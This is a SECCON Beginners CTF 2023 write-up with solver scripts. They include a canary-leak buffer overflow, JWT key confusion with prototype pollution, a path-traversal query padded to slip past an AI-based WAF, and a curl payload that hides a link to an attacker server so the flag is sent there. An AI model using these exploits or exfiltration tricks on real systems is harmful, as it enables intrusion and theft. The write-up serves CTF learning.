# SECCON Beginners CTF 2023 Writeup

![score.beginners.seccon.jp_teams](https://hackmd.io/_uploads/Byo9p-64T.png)

## crypto

### CoughingFox2

> The original cipher for beginners and encrypted text are provided. Needless to say, this cipher is too childish, and that easy to decrypt! So, could you please decrypt it?

```python
import math

# cipher.txt holds a single line of the form `cipher = [...]`
with open('./cipher.txt') as f:
    exec(f.readline())

# The solver assumes each value is (flag[i] + flag[i+1])**2 + i, stored in
# shuffled order: the position i of a value is the one that leaves a perfect square.
xs = [0] * len(cipher)
for c in cipher:
    for i in range(len(cipher)):
        x = math.sqrt(c - i)
        if x.is_integer():
            xs[i] = x

# The flag starts with 'c'; each next character is the pair sum minus the previous one
flag = [ord('c')]
for x in xs:
    flag.append(int(x) - flag[-1])
print(''.join([chr(c) for c in flag]))
```

#### Flag
`ctf4b{hi_b3g1nner!g00d_1uck_4nd_h4ve_fun!!!}`

### Conquer

> This problem somehow looks like it will make your head spin...

```python
from Crypto.Util.number import *

# N-step right rotation inside a `length`-bit word (the inverse of the challenge's ROL)
def ROR(bits, N, length):
    for _ in range(N):
        bits = (bits >> 1) | (bits & 1) * (2 ** (length - 1))
    return bits

# output.txt holds `key = ...` and `cipher = ...`
with open('./output.txt') as f:
    exec(f.readline())
    exec(f.readline())

# The bit length of the flag is not published, so try every plausible flag length
for l in range(1, 100):
    length = bytes_to_long(b'a' * l).bit_length()
    c = cipher
    k = key
    # Undo the 32 rounds in reverse: XOR, rotate the key back, XOR
    for i in range(32):
        c ^= k
        k = ROR(k, pow(c, 3, length), length)
        c ^= k
    flag = long_to_bytes(c)
    if flag.startswith(b'ctf4b{'):
        print(flag)
```

#### Flag
`ctf4b{SemiCIRCLErCanalsHaveBeenConqueredByTheCIRCLE!!!}`

## misc

### YARO

> Malware may have gotten into the server, so please find it with your perfect signature.

```python
import re
from pwn import *

def find(flag):
    io = remote('yaro.beginners.seccon.games', 5003)
    rules = []
    # One rule per printable candidate for the next character; a double quote or
    # backslash has to be escaped inside a YARA string literal
    for i in range(0x20, 0x7e + 1):
        if i == 34 or i == 92:
            s = f'{flag}\\{chr(i)}'
        else:
            s = f'{flag}{chr(i)}'
        rules.append(f'rule flag{i} {{strings: $s{i} = "{s}" condition: $s{i}}}')
    for rule in rules:
        io.sendline(bytes(rule, 'ascii'))
    io.sendline()                 # an empty line ends the rule input
    for rule in rules:
        io.recvline()             # one response line per submitted rule
    for _ in range(5):
        io.recvline()             # lines preceding the match result
    found = io.recvline().decode()
    io.close()
    # The first number in the result line is the index of the matching rule,
    # i.e. the character code of the next flag byte
    match = re.search('([0-9]+)', found)
    if match is None:
        return -1
    return int(match.group(0))

flag = 'ctf4b'
while True:
    c = find(flag)
    if c < 0:
        print(flag)
        break
    flag += chr(c)
```

#### Flag
`ctf4b{Y3t_An0th3r_R34d_Opp0rtun1ty}`

### polyglot4b

> What is a polyglot? I think I developed an editor that can create polyglots!

Add `PNG GIF ASCII` to the description of polyglot4b/sample/sushi.jpg.

#### Flag
`ctf4b{y0u_h4v3_fully_und3r5700d_7h15_p0ly6l07}`

## pwnable

### poem

> I wrote a poem!

```
$ nc poem.beginners.seccon.games 9000
Number[0-4]: -4
ctf4b{y0u_sh0uld_v3rify_the_int3g3r_v4lu3}
```

#### Flag
`ctf4b{y0u_sh0uld_v3rify_the_int3g3r_v4lu3}`

### rewriter2

> BOF...?

```python
from pwn import *

io = remote('rewriter2.beginners.seccon.games', 9001)

# First write: fill the 40-byte buffer exactly. The newline appended by sendline
# overwrites the canary's null low byte, so the program's echo leaks the other 7 bytes.
payload = b''
payload += b'A' * 40
io.sendline(payload)

s = io.recvuntil(b'How')
i = s.index(b'AAAAA\n') + 6
canary = b'\x00' + s[i:i+7]          # put the null low byte back

# Second write: buffer, intact canary, saved rbp, then the return address
payload = b''
payload += b'A' * 40
payload += canary
payload += b'\x00' * 8
payload += p64(0x4012d6)
io.sendline(payload)
io.interactive()
```

#### Flag
`ctf4b{y0u_c4n_l34k_c4n4ry_v4lu3}`

## reversing

### Half

> Let's find out what kind of file this binary file is!
>
> Also, how do you look at the contents of this file...?

```
$ strings half
(omitted)
ctf4b{ge4_t0_kn0w_the
_bin4ry_fi1e_with_s4ring3}
(omitted)
```

#### Flag
`ctf4b{ge4_t0_kn0w_the_bin4ry_fi1e_with_s4ring3}`

### Three

> Just taking a quick look inside this file doesn't seem to reveal the flag!
>
> Maybe we need some specialized tool for analyzing binary files?

```python
import angr

p = angr.Project('./three')
state = p.factory.entry_state()
sim = p.factory.simulation_manager(state)
# Explore until the success path (offset 0x1315, binary loaded at angr's default base 0x400000)
sim.explore(find=(0x400000 + 0x1315,))
for found in sim.found:
    # The stdin (fd 0) input that reaches that address is the flag
    print(found.posix.dumps(0).decode())
```

#### Flag
`ctf4b{c4n_y0u_ab1e_t0_und0_t4e_t4ree_sp1it_f14g3}`

## Web

### double check

> Double check is very secure.
```javascript
const jwt = require("jsonwebtoken");
const { readKeyFromFile } = require("./utils");   // helper from the challenge source

(async () => {
  // Register as admin to obtain the session cookie
  const r = await fetch('https://double-check.beginners.seccon.games/register', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ username: 'admin', password: 'password' }),
  });
  const cookie = r.headers.get('set-cookie');

  // The payload is kept as a raw JSON string so the "__proto__" key survives
  // (an object literal would set the prototype instead of an own property).
  // It is signed with HS256 using the server's *public* key as the HMAC secret.
  const payload = '{"username":"admin", "admin":true, "__proto__": { "admin" : true }}';
  const signed = jwt.sign(payload, readKeyFromFile("keys/public.key"), { algorithm: "HS256" });

  const res = await fetch('https://double-check.beginners.seccon.games/flag', {
    method: 'POST',
    headers: { Authorization: signed, Cookie: cookie },
  });
  console.log(await res.text());
})();
```

#### Flag
`ctf4b{Pr0707yp3_P0llU710n_f0R_7h3_w1n}`

### Forbidden

> You don't have permission to access /flag on this server.

Access `/Flag` instead of `/flag`.

#### Flag
`ctf4b{403_forbidden_403_forbidden_403}`

### aiwaf

> Get past the AI-WAF!! Note: the AI-WAF is moody, so the hack may or may not work.

`?12345678901234567890123456789012345678901234567890&file=../flag`

#### Flag
`ctf4b{pr0mp7_1nj3c710n_c4n_br34k_41_w4f}`

### phisher2

> What you can see is not everything, but the previous attacks should no longer work.

```
curl -X POST -H "Content-Type: application/json" -d '{"text":"<span style=\"display: none;\">http://${server that receives the flag}/ </span>https://phisher2.beginners.seccon.games/foobar"}' https://phisher2.beginners.seccon.games
```

#### Flag
`ctf4b{w451t4c4t154w?}`
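For the Conquer solver in the crypto section, an added example (not code from the writeup or the challenge) that reconstructs the round structure the solver inverts. The `encrypt` side is my assumption obtained by reversing the solver's loop, `SAMPLE_FLAG` and `SAMPLE_KEY` are constructed values, and the point is that `ROL` and `ROR` are exact inverses inside a `length`-bit word, which is what lets the 32 rounds be unwound from the published final key.

```python
# Added example: Conquer's round structure, reconstructed by inverting the writeup's solver.
# encrypt() is an assumption about the challenge; decrypt() mirrors the solver's inner loop.

def bytes_to_long(b: bytes) -> int:
    return int.from_bytes(b, 'big')

def long_to_bytes(n: int) -> bytes:
    return n.to_bytes((n.bit_length() + 7) // 8, 'big')

def ROL(bits: int, n: int, length: int) -> int:
    """Rotate left n times inside a length-bit word (masked so no bit escapes)."""
    for _ in range(n):
        bits = ((bits << 1) | (bits >> (length - 1))) & ((1 << length) - 1)
    return bits

def ROR(bits: int, n: int, length: int) -> int:
    """Rotate right n times; the exact inverse of ROL for values below 2**length."""
    for _ in range(n):
        bits = (bits >> 1) | ((bits & 1) << (length - 1))
    return bits

def encrypt(flag: bytes, key: int):
    """Assumed scheme: 32 rounds of XOR, state-dependent key rotation, XOR.
    Returns (cipher, final_key, length); the challenge published only the first two."""
    c = bytes_to_long(flag)
    length = c.bit_length()
    k = key & ((1 << length) - 1)              # the key must fit the word for ROL/ROR to invert
    for _ in range(32):
        c ^= k
        k = ROL(k, pow(c, 3, length), length)  # rotation count depends on the running state
        c ^= k
    return c, k, length

def decrypt(cipher: int, key: int, length: int) -> bytes:
    """The solver's loop: undo the last XOR, rotate the key back, undo the first XOR."""
    c, k = cipher, key
    for _ in range(32):
        c ^= k
        k = ROR(k, pow(c, 3, length), length)
        c ^= k
    return long_to_bytes(c)

def round_trip(flag: bytes, key: int) -> bytes:
    cipher, final_key, length = encrypt(flag, key)
    return decrypt(cipher, final_key, length)

# Constructed sample values, not the challenge's output
SAMPLE_FLAG = b'ctf4b{constructed_sample_flag}'
SAMPLE_KEY = int.from_bytes(b'constructed key material, not the real one', 'big')
```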
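For polyglot4b in the misc section, an added example (not from the writeup or the challenge) of why writing `PNG GIF ASCII` into the image's description is enough. It assumes, as an inference from the solve rather than anything the page states, that the checker looked for format names in a `file`-style description that includes the JPEG comment; the hardened check trusts only header bytes. The JPEG bytes are constructed inline.

```python
import struct

MAGIC = {                       # leading bytes that actually identify each format
    'JPEG': b'\xff\xd8\xff',
    'PNG': b'\x89PNG\r\n\x1a\n',
    'GIF': b'GIF8',
}

def jpeg_with_comment(comment: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, one COM segment, EOI (no image data at all)."""
    seg = b'\xff\xfe' + struct.pack('>H', len(comment) + 2) + comment
    return b'\xff\xd8' + seg + b'\xff\xd9'

def jpeg_comment(data: bytes):
    """Walk the marker segments after SOI and return the first COM payload, if any."""
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        seglen = struct.unpack('>H', data[pos + 2:pos + 4])[0]
        if marker == 0xFE:
            return data[pos + 4:pos + 2 + seglen].decode('latin-1')
        pos += 2 + seglen
    return None

def describe(data: bytes) -> str:
    """Imitates `file`: the format name plus embedded metadata such as a JPEG comment."""
    if data.startswith(MAGIC['JPEG']):
        comment = jpeg_comment(data)
        return 'JPEG image data' + (f', comment: "{comment}"' if comment else '')
    for name in ('PNG', 'GIF'):
        if data.startswith(MAGIC[name]):
            return f'{name} image data'
    return 'data'

def check_by_description(data: bytes) -> set:
    """Weak check (assumed to be the challenge's): format names found in the description."""
    desc = describe(data)
    return {n for n in ('JPEG', 'PNG', 'GIF', 'ASCII') if n in desc}

def check_by_magic(data: bytes) -> set:
    """Hardened check: only header bytes count, and ASCII means every byte is printable."""
    found = {n for n, m in MAGIC.items() if data.startswith(m)}
    if data and all(b in b'\t\n\r' or 32 <= b < 127 for b in data):
        found.add('ASCII')
    return found
```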
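For aiwaf in the Web section, an added example (not from the writeup or the challenge) of the weakness the padded query relies on. It assumes, as an inference from the payload rather than a fact on the page, that the WAF judged only a fixed-length prefix of the query string; `WINDOW` is a constructed value, and the hardened check judges each decoded parameter value instead.

```python
from urllib.parse import parse_qsl

WINDOW = 50                          # assumed size of the prefix the weak WAF inspects
TRAVERSAL = ('../', '..\\')          # the traversal pattern the page's payload relies on

def weak_waf_blocks(query: str) -> bool:
    """Only the first WINDOW characters are judged: anything after them is never seen."""
    return any(t in query[:WINDOW] for t in TRAVERSAL)

def hardened_waf_blocks(query: str) -> bool:
    """Parse the whole query, URL-decode every value, and judge each one on its own,
    so neither the position of a parameter nor the length of the query matters."""
    for _, value in parse_qsl(query, keep_blank_values=True):
        if any(t in value for t in TRAVERSAL):
            return True
    return False

# The query string from the writeup (leading '?' stripped): 50 filler digits, then the file parameter
PAGE_PAYLOAD = '12345678901234567890123456789012345678901234567890&file=../flag'
```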